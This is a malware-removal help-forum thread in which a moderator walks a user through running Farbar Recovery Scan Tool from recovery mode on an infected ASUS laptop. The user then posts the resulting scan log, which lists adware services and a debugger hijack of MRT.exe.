Solved Extremely High Disk Activity with various virus infections

Discussion in 'Malware and Virus Removal' started by scgoh123, 2017/03/13.

  1. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    My friend's laptop has been heavily infected with viruses. Here are the basic specs of her laptop:

    ASUS TP300L

    Intel i3 1.90GHz
    4GB RAM
    500GB HDD
    OS Windows 8

    The main problem is that, with the above specs, her laptop lags heavily even when she's opening Microsoft Word or browsing with Google Chrome.

    The second thing that I've noticed is that there are a lot of ASUS Smart Gesture programs (like 10+ background processes) running, which eat up the RAM and disk usage.

    The third one is that her browser was hijacked by various PUPs and her default search engine has been changed to another one instead of Google.

    The last one is that her laptop always loses its WiFi connection for unknown reasons.

    Required logs will be posted later because the laptop took ages to scan and there's an error, which is 'FRST failed to write in directory C:\FRST\Drivers'.
     
  2. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    10 minutes have passed and it's still at the initializing stage.

    UPDATE: 50 mins have passed but it keeps scanning Asus TPcenter.exe and Asus TPstrike.dll indefinitely.
     
    Last edited: 2017/03/13

  4. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,701
    Likes Received:
    116
    Please observe the following rules:
    • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
    • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
    • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
    • Never run more than one scan at a time.
    • Keep updating me regarding your computer behavior, good or bad.
    • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
    • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
    • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

    =============================

    Still stuck?
     
  5. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Yes. Still stuck and I tried with safe mode but still the same.
     
  6. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Let's try to run it from the outside...

    For x32 (x86) bit systems download Farbar Recovery Scan Tool 32-Bit and save it to a flash drive.
    For x64 bit systems download Farbar Recovery Scan Tool 64-Bit and save it to a flash drive.

    Plug the flash drive into the infected PC.

    If you are using Windows 10: if you're having problems accessing System Recovery Options, create a Windows 10 USB or DVD as described here: How to download Windows 10 and create your own installation USB flash drive or DVD and boot from it.

    If you are using Windows 8 consult How to use the Windows 8 System Recovery Environment Command Prompt to enter System Recovery Command prompt. To access Advanced Boot Options start and shut down computer TWICE. On third start you should see Advanced Boot Options.

    If you are using Vista or Windows 7 enter System Recovery Options.

    To enter System Recovery Options from the Advanced Boot Options:
    • Restart the computer.
    • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
    • Use the arrow keys to select the Repair your computer menu item.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.

    To enter System Recovery Options by using Windows installation disc:
    • Insert the installation disc.
    • Restart your computer.
    • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
    • Click Repair your computer.
    • Select US as the keyboard language settings, and then click Next.
    • Select the operating system you want to repair, and then click Next.
    • Select your user account and click Next.

    On the System Recovery Options menu you will get the following options:

    • Startup Repair
    • System Restore
    • Windows Complete PC Restore
    • Windows Memory Diagnostic Tool
    • Command Prompt

    • Select Command Prompt
    • In the command window type in notepad and press Enter.
    • The notepad opens. Under File menu select Open.
    • Select "Computer" and find your flash drive letter and close the notepad.
    • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
      Note:
      Replace letter e with the drive letter of your flash drive.
    • The tool will start to run.
    • When the tool opens click Yes to disclaimer.
    • Press Scan button.
    • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
     
  7. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    FRST log:
    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 13-03-2017
    Ran by SYSTEM on MININT-53ON26Q (14-03-2017 12:19:00)
    Running from F:\
    Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
    Internet Explorer Version 11
    Boot Mode: Recovery
    Default: ControlSet001
    ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.

    Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

    ==================== Registry (Whitelisted) ====================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\system32\DptfPolicyLpmServiceHelper.exe [114048 2013-10-17] (Intel Corporation)
    HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\ASUSWSLoader.exe [63296 2014-08-19] ()
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [508800 2014-12-17] (Oracle Corporation)
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [9080768 2016-12-11] (AVAST Software)
    HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [27308304 2017-03-06] (Dropbox, Inc.)
    HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-08] (CANON INC.)
    HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-06-30] (Autodesk, Inc.)
    IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Tafleclwther\_ALLOWDEL_24474264\Gubed.exe -Yrrehs
    GroupPolicy: Restriction <======= ATTENTION

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-06-30] (Autodesk Inc.)
    S2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\AsusWSWinService.exe [71168 2014-08-19] (ASUS Cloud Corporation)
    S2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-09-27] (AVAST Software)
    S2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3704520 2017-02-18] (Microsoft Corporation)
    S3 CoordinatorServiceHost; C:\Program Files\SolidWorks Corp 2016\SOLIDWORKS\swScheduler\DTSCoordinatorService.exe [80792 2017-01-10] (Dassault Systèmes SolidWorks Corporation)
    S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
    S2 DbxSvc; C:\Windows\system32\DbxSvc.exe [46408 2017-01-20] (Dropbox, Inc.)
    S2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [117704 2013-10-17] (Intel Corporation)
    S2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116680 2013-10-17] (Intel Corporation)
    S2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [126952 2013-10-17] (Intel Corporation)
    S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [167088 2017-02-28] ()
    S2 GubedZL; C:\Program Files (x86)\Gubed\GubedZL.dll [118272 2017-02-03] ()
    S2 GubZL; C:\Program Files (x86)\Gub\GubZL.dll [122880 2017-02-09] ()
    S2 iedvutils; C:\Program Files (x86)\Explorer\iedvutils.exe [55992 2017-02-28] ()
    S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282072 2014-03-17] (Intel Corporation)
    S2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [253528 2015-11-08] ()
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [827392 2013-09-02] (Intel(R) Corporation)
    S2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-10-23] (Intel Corporation)
    S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-08-18] (Elex do Brasil Participações Ltda)
    S3 iThemes5; C:\Program Files (x86)\Common Files\Services\iThemes.dll [567808 2016-12-09] () <==== ATTENTION
    S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-10-23] (Intel Corporation)
    S2 Kyubey; C:\Users\User\AppData\Roaming\Kyubey\Kyubey.exe [113664 2017-03-12] ()
    S2 mitsijm2017; C:\Program Files\Autodesk\Inventor 2017\Moldflow\bin\mitsijm.exe [967456 2015-08-04] (Autodesk, Inc.)
    S2 Ntp2NetSvc; C:\Program Files (x86)\notepad2\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr)
    S2 Ntp2UpSvc; C:\Program Files (x86)\Common Files\ntp2UpSvc\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr)
    S2 SoftshieldService; C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe [67848 2017-01-07] (Hewlett-Packard)
    S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-28] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
    S2 TransformService; C:\Program Files\ASUS\ASUS FlipLock\TransformService.exe [73528 2014-07-08] (ASUS)
    S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
    S2 WinSAPSvc; C:\Users\User\AppData\Roaming\WinSAPSvc\WinSAP.dll [184320 2017-03-12] (Windows)
    S2 WinSnare; C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-12] (InterSect Alliance Pty Ltd) <==== ATTENTION
    S2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe [1254960 2016-08-29] (ExWzp Pvt Ltd.) <==== ATTENTION
    S2 ed2kidle; "C:\Program Files (x86)\amuleC\ed2k.exe" -downloadwhenidle [X] <==== ATTENTION

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-09-27] (AVAST Software)
    S1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-09-27] (AVAST Software)
    S2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108816 2016-09-27] (AVAST Software)
    S1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-09-27] (AVAST Software)
    S0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-09-27] (AVAST Software)
    S1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [969184 2016-09-27] (AVAST Software)
    S1 aswSP; C:\Windows\system32\drivers\aswSP.sys [513632 2016-09-27] (AVAST Software)
    S2 aswStm; C:\Windows\system32\drivers\aswStm.sys [163416 2016-09-27] (AVAST Software)
    S0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [293352 2016-10-17] (AVAST Software)
    S3 ATP; C:\Windows\System32\drivers\AsusTP.sys [73512 2014-07-29] (ASUS Corporation)
    S3 AX88772; C:\Windows\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (ASIX Electronics Corp.)
    S3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [289744 2013-10-17] (Intel Corporation)
    S3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494296 2013-10-17] (Intel Corporation)
    S3 iaLPSS_GPIO; C:\Windows\System32\drivers\iaLPSS_GPIO.sys [24568 2013-08-08] (Intel Corporation)
    S3 iaLPSS_I2C; C:\Windows\System32\drivers\iaLPSS_I2C.sys [99320 2013-08-08] (Intel Corporation)
    S3 INVN_MotionApps; C:\Windows\system32\DRIVERS\WUDFRd.sys [226304 2014-10-28] (Microsoft Corporation)
    S1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-22] (Elex do Brasil Participações Ltda)
    S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-22] (Elex do Brasil Participações Ltda)
    S1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-18] (Elex do Brasil Participações Ltda)
    S3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
    S3 m76usb; C:\Windows\System32\drivers\m76usb.sys [539336 2014-04-28] (Ralink Technology Corp.)
    S3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-10-23] (Intel Corporation)
    S3 SensorsAlsDriver; C:\Windows\System32\drivers\WUDFRd.sys [226304 2014-10-28] (Microsoft Corporation)
    S3 SensorsServiceDriver; C:\Windows\System32\drivers\WUDFRd.sys [226304 2014-10-28] (Microsoft Corporation)
    S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
    S0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
    S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
    S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X]
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    S0 msahci; system32\drivers\msahci.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-03-13 19:49 - 2017-03-13 20:16 - 00198774 _____ C:\Windows\ntbtlog.txt
    2017-03-13 18:57 - 2017-03-13 20:14 - 00062374 _____ C:\Users\User\Downloads\Addition.txt
    2017-03-13 18:42 - 2017-03-13 19:54 - 00059058 _____ C:\Users\User\Downloads\FRST.txt
    2017-03-13 18:37 - 2017-03-13 18:42 - 00000000 ____D C:\FRST
    2017-03-13 18:37 - 2017-03-13 18:37 - 02424832 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
    2017-03-13 01:39 - 2017-03-13 01:43 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.2.9)
    2017-03-11 20:11 - 2017-03-11 20:11 - 00030195 _____ C:\Users\User\Downloads\MA1506 Tutorial 6 Solutions.pdf
    2017-03-09 06:33 - 2017-03-13 01:24 - 00321487 _____ C:\Users\User\Desktop\Water Scarcity in northwestern Cambodia.pptx
    2017-03-07 06:46 - 2017-03-11 19:59 - 00079052 _____ C:\Users\User\Documents\Microfluidic.bak
    2017-03-07 06:06 - 2017-03-07 06:06 - 00000152 _____ C:\Users\User\Documents\acad.err
    2017-03-07 05:05 - 2017-03-07 05:05 - 00000000 ____D C:\Program Files (x86)\58BEB01D_cacayima
    2017-03-07 04:42 - 2017-03-07 06:06 - 00112680 _____ C:\Users\User\Documents\Drawing1_recover.dwg
    2017-03-07 04:42 - 2017-03-07 04:42 - 00000195 ____H C:\Users\User\Documents\Drawing1.dwl2
    2017-03-07 04:42 - 2017-03-07 04:42 - 00000045 ____H C:\Users\User\Documents\Drawing1.dwl
    2017-03-07 00:09 - 2017-03-13 02:03 - 00000000 ____D C:\Program Files (x86)\amulell
    2017-03-06 20:03 - 2017-03-12 20:17 - 00003480 _____ C:\Windows\System32\Tasks\ASUS Live Update1
    2017-03-06 12:50 - 2017-03-06 12:50 - 00046184 _____ (Dropbox, Inc.) C:\Windows\System32\Drivers\dbx-stable.sys
    2017-03-05 21:38 - 2017-03-11 20:02 - 00078729 _____ C:\Users\User\Documents\Microfluidic.dwg
    2017-03-05 18:08 - 2017-03-05 18:08 - 00002116 _____ C:\Users\Public\Desktop\AutoCAD 2017 - English.lnk
    2017-03-05 18:07 - 2017-03-05 19:27 - 00000000 ____D C:\Users\User\Documents\Inventor Server SDK ACAD 2017
    2017-03-05 04:29 - 2017-03-05 04:29 - 00000000 ____D C:\Program Files (x86)\amuleCexx
    2017-03-05 04:25 - 2017-03-05 04:29 - 00000000 ____D C:\Program Files (x86)\MK
    2017-03-05 04:22 - 2010-06-01 12:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
    2017-03-05 04:22 - 2010-06-01 12:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\System32\xactengine3_7.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\System32\D3DX9_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\System32\d3dcsx_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\System32\d3dx10_43.dll
    2017-03-05 04:22 - 2010-05-25 19:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
    2017-03-05 04:22 - 2006-03-30 20:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\System32\d3dx9_30.dll
    2017-03-05 04:22 - 2006-03-30 20:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
    2017-03-05 04:22 - 2006-03-30 20:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\System32\xactengine2_1.dll
    2017-03-05 04:22 - 2006-03-30 20:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
    2017-03-05 04:22 - 2006-03-30 20:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\System32\xinput1_1.dll
    2017-03-05 04:22 - 2006-03-30 20:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
    2017-03-05 04:22 - 2006-02-02 16:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\System32\x3daudio1_0.dll
    2017-03-05 04:22 - 2006-02-02 16:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
    2017-03-02 03:25 - 2017-03-13 18:30 - 00015450 _____ C:\Program Files (x86)\metadata
    2017-03-02 03:25 - 2017-03-13 01:46 - 00000040 _____ C:\Program Files (x86)\settings.dat
    2017-03-01 04:44 - 2017-03-01 04:44 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-03-01 04:42 - 2017-03-13 19:33 - 00000000 ____D C:\Program Files (x86)\58B6C1AE_cacayima
    2017-03-01 04:42 - 2017-03-09 03:39 - 00000000 _____ C:\Windows\SysWOW64\4
    2017-03-01 04:42 - 2017-03-09 03:39 - 00000000 _____ C:\Windows\SysWOW64\3
    2017-03-01 04:42 - 2017-03-02 03:25 - 00002422 _____ C:\Users\Public\Desktop\Google Chrome.lnk
    2017-03-01 04:42 - 2017-03-02 03:25 - 00002199 _____ C:\Users\Public\Desktop\Internet Explorer.lnk
    2017-03-01 04:42 - 2017-03-01 04:42 - 00000000 ____D C:\Program Files (x86)\Explorer
    2017-03-01 04:03 - 2017-03-01 04:03 - 00000000 ____D C:\Users\User\AppData\Roaming\Kyubey
    2017-03-01 02:23 - 2017-03-01 02:23 - 00012740 _____ C:\Users\User\Downloads\Chem E Challenge 2017 - Responses - 2017-3-1 13-40.xlsx
    2017-03-01 02:23 - 2017-03-01 02:23 - 00009616 _____ C:\Users\User\Downloads\Chem E Challenge Ambassador Recruitment - Responses - 2017-2-24 0-11.xlsx
    2017-03-01 02:23 - 2017-03-01 02:23 - 00003920 _____ C:\Users\User\Downloads\Chem E Challenge Ambassador Recruitment - Responses - 2017-3-1 13-39.xlsx
    2017-03-01 02:21 - 2017-03-01 02:22 - 00000000 ____D C:\Users\User\AppData\Local\WhatsApp
    2017-02-28 01:27 - 2017-02-28 01:33 - 82418960 _____ (WhatsApp) C:\Users\User\Downloads\WhatsAppSetup.exe
    2017-02-26 20:59 - 2017-02-26 20:59 - 00341094 _____ C:\Users\User\Downloads\Final Assignment2.pdf
    2017-02-26 20:11 - 2017-02-26 20:11 - 00063649 _____ C:\Users\User\Downloads\bridge3.159.0_en.html
    2017-02-20 10:39 - 2017-02-20 10:48 - 00000000 ____D C:\Program Files (x86)\dm72nb8v
    2017-02-20 08:55 - 2017-02-20 09:03 - 00000000 ____D C:\Program Files (x86)\r2i2joqg
    2017-02-20 06:39 - 2017-02-20 06:47 - 00000000 ____D C:\Program Files (x86)\ia1cpuc6
    2017-02-20 04:39 - 2017-02-20 04:53 - 00000000 ____D C:\Program Files (x86)\dwyhdf69
    2017-02-20 04:16 - 2017-02-20 04:24 - 00000000 ____D C:\Program Files (x86)\0wbg7wae
    2017-02-20 01:14 - 2017-02-20 01:17 - 00168454 _____ C:\Users\User\Downloads\The Hydrolysis of t-Butyl Chloride updated.doc.crdownload
    2017-02-20 00:39 - 2017-02-20 01:04 - 00000000 ____D C:\Program Files (x86)\lw2zy2ie
    2017-02-19 23:57 - 2017-02-20 00:18 - 00000000 ____D C:\Program Files (x86)\gyzi4t6u
    2017-02-19 07:29 - 2017-02-19 07:31 - 03087864 _____ (Google) C:\Users\User\Downloads\chrome_cleanup_tool.exe
    2017-02-16 16:55 - 2017-02-16 16:58 - 00000000 ____D C:\Program Files (x86)\4itqc3ys
    2017-02-16 05:44 - 2017-02-16 05:45 - 00000000 ____D C:\Program Files (x86)\ju8x1gmi
    2017-02-16 02:39 - 2017-02-16 02:40 - 00000000 ____D C:\Program Files (x86)\m7x11pin
    2017-02-16 00:40 - 2017-02-16 00:40 - 00000000 ____D C:\Program Files (x86)\notepad2
    2017-02-16 00:39 - 2017-02-16 00:40 - 00000000 ____D C:\Program Files (x86)\l54k8krf
    2017-02-15 05:19 - 2017-02-15 05:19 - 04575394 _____ C:\Users\User\Downloads\Chapter 6 Mechanical Properties.pdf
    2017-02-15 04:39 - 2017-02-15 04:40 - 00000000 ____D C:\Program Files (x86)\59uga437
    2017-02-15 02:39 - 2017-02-15 02:40 - 00000000 ____D C:\Program Files (x86)\1mrl8vv0
    2017-02-14 17:07 - 2017-02-14 17:09 - 00000000 ____D C:\Program Files (x86)\0fg9beco
    2017-02-14 06:39 - 2017-02-14 06:40 - 00000000 ____D C:\Program Files (x86)\hmq44j4e
    2017-02-14 06:07 - 2017-02-14 06:07 - 00000000 ____D C:\Users\User\AppData\Local\Stancine
    2017-02-14 06:07 - 2017-02-14 06:07 - 00000000 ____D C:\ProgramData\Apple Computer
    2017-02-14 06:04 - 2017-03-02 07:05 - 00000000 ____D C:\Users\User\AppData\LocalLow\Mozilla
    2017-02-14 06:04 - 2017-03-02 03:25 - 00002325 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-02-14 06:04 - 2017-02-14 06:04 - 00000000 ____D C:\Users\User\AppData\Roaming\Firefox
    2017-02-14 06:04 - 2017-02-14 06:04 - 00000000 ____D C:\Users\User\AppData\Local\Firefox
    2017-02-14 06:04 - 2016-05-22 18:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\System32\Drivers\iSafeKrnlBoot.sys
    2017-02-14 06:04 - 2016-05-18 22:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\System32\Drivers\iSafeNetFilter.sys
    2017-02-14 06:03 - 2017-02-14 06:03 - 00000000 ____D C:\Users\User\AppData\Roaming\Elex-tech
    2017-02-14 06:03 - 2017-02-14 06:03 - 00000000 ____D C:\Program Files (x86)\Stancine
    2017-02-14 06:03 - 2017-02-14 06:03 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-02-14 05:23 - 2017-02-21 21:25 - 00000000 ____D C:\Program Files (x86)\bilibili
    2017-02-14 05:22 - 2017-02-20 01:48 - 00000000 ____D C:\Program Files (x86)\BikaQRssReader
    2017-02-14 05:22 - 2017-02-14 05:23 - 00000000 ____D C:\Program Files (x86)\t0ocinc7
    2017-02-14 05:22 - 2017-02-14 05:22 - 00003218 _____ C:\Windows\System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel
    2017-02-13 16:00 - 2017-02-13 16:00 - 00000000 ____D C:\Program Files (x86)\xdm3x2z0
    2017-02-13 07:20 - 2017-03-13 19:33 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSAPSvc
    2017-02-13 07:05 - 2017-02-13 07:06 - 00000000 ____D C:\Program Files (x86)\3ioaeew8

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-03-13 20:17 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\System32\config\BBI
    2017-03-13 19:47 - 2013-08-22 06:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2017-03-13 19:45 - 2016-08-16 05:48 - 00000554 _____ C:\Windows\Tasks\MATLAB R2016a Startup Accelerator.job
    2017-03-13 19:43 - 2015-07-12 13:04 - 00004180 _____ C:\Windows\System32\Tasks\avast! Emergency Update
    2017-03-13 19:41 - 2016-07-29 11:43 - 00000000 ____D C:\Program Files (x86)\WinZipper
    2017-03-13 19:41 - 2015-07-12 17:18 - 00000000 ___RD C:\Users\User\OneDrive
    2017-03-13 19:41 - 2015-07-12 11:49 - 00000094 _____ C:\Users\User\AppData\Roaming\sp_data.sys
    2017-03-13 19:40 - 2015-07-12 11:51 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3023424667-1579791547-2771295078-1001
    2017-03-13 19:39 - 2015-11-08 08:41 - 00000000 ___RD C:\Users\User\Dropbox
    2017-03-13 19:39 - 2015-07-12 12:35 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2017-03-13 19:38 - 2016-08-23 07:01 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-03-13 19:35 - 2015-11-08 08:31 - 00000910 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
    2017-03-13 19:34 - 2013-08-22 06:44 - 00616208 _____ C:\Windows\System32\FNTCACHE.DAT
    2017-03-13 19:33 - 2016-08-22 00:40 - 00000000 ____D C:\ProgramData\ChelfNotify
    2017-03-13 19:33 - 2015-11-08 08:31 - 00000000 ____D C:\Program Files (x86)\Dropbox
    2017-03-13 19:25 - 2017-01-10 00:20 - 00000000 ____D C:\Users\User\AppData\Local\Akamai
    2017-03-13 18:53 - 2015-11-08 08:31 - 00000914 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
    2017-03-13 18:30 - 2017-01-08 04:28 - 00000000 ____D C:\Program Files (x86)\reports
    2017-03-13 02:04 - 2017-01-16 16:58 - 00000000 ____D C:\Users\User\AppData\Roaming\aMule
    2017-03-13 01:43 - 2017-01-19 02:10 - 00003590 _____ C:\Windows\System32\Tasks\Milimili
    2017-03-13 01:43 - 2017-01-09 03:18 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSnare
    2017-03-12 20:17 - 2016-09-02 19:25 - 00003470 _____ C:\Windows\System32\Tasks\ASUS Live Update2
    2017-03-12 18:15 - 2015-07-12 11:45 - 00000000 ____D C:\Users\User\AppData\Local\Packages
    2017-03-12 16:12 - 2015-07-12 17:19 - 00003906 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{870AB941-DEA7-4AE7-ACD4-F8FC5B4235A8}
    2017-03-11 01:45 - 2013-08-22 07:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2017-03-11 01:43 - 2013-08-22 05:36 - 00000000 ____D C:\Windows\Inf
    2017-03-11 01:41 - 2016-08-23 00:02 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-03-11 01:13 - 2017-01-10 04:24 - 00000000 ____D C:\Users\Public\Documents\.forever
    2017-03-09 05:43 - 2016-08-19 03:06 - 00000000 ____D C:\Users\User\AppData\Roaming\WhatsApp
    2017-03-08 17:36 - 2015-11-08 08:30 - 00000000 ____D C:\Users\User\AppData\Local\Dropbox
    2017-03-07 19:06 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\System32\NDF
    2017-03-07 05:05 - 2016-09-07 06:47 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-03-07 00:17 - 2017-01-11 19:10 - 00000000 ____D C:\Users\User\AppData\Local\SolidWorks
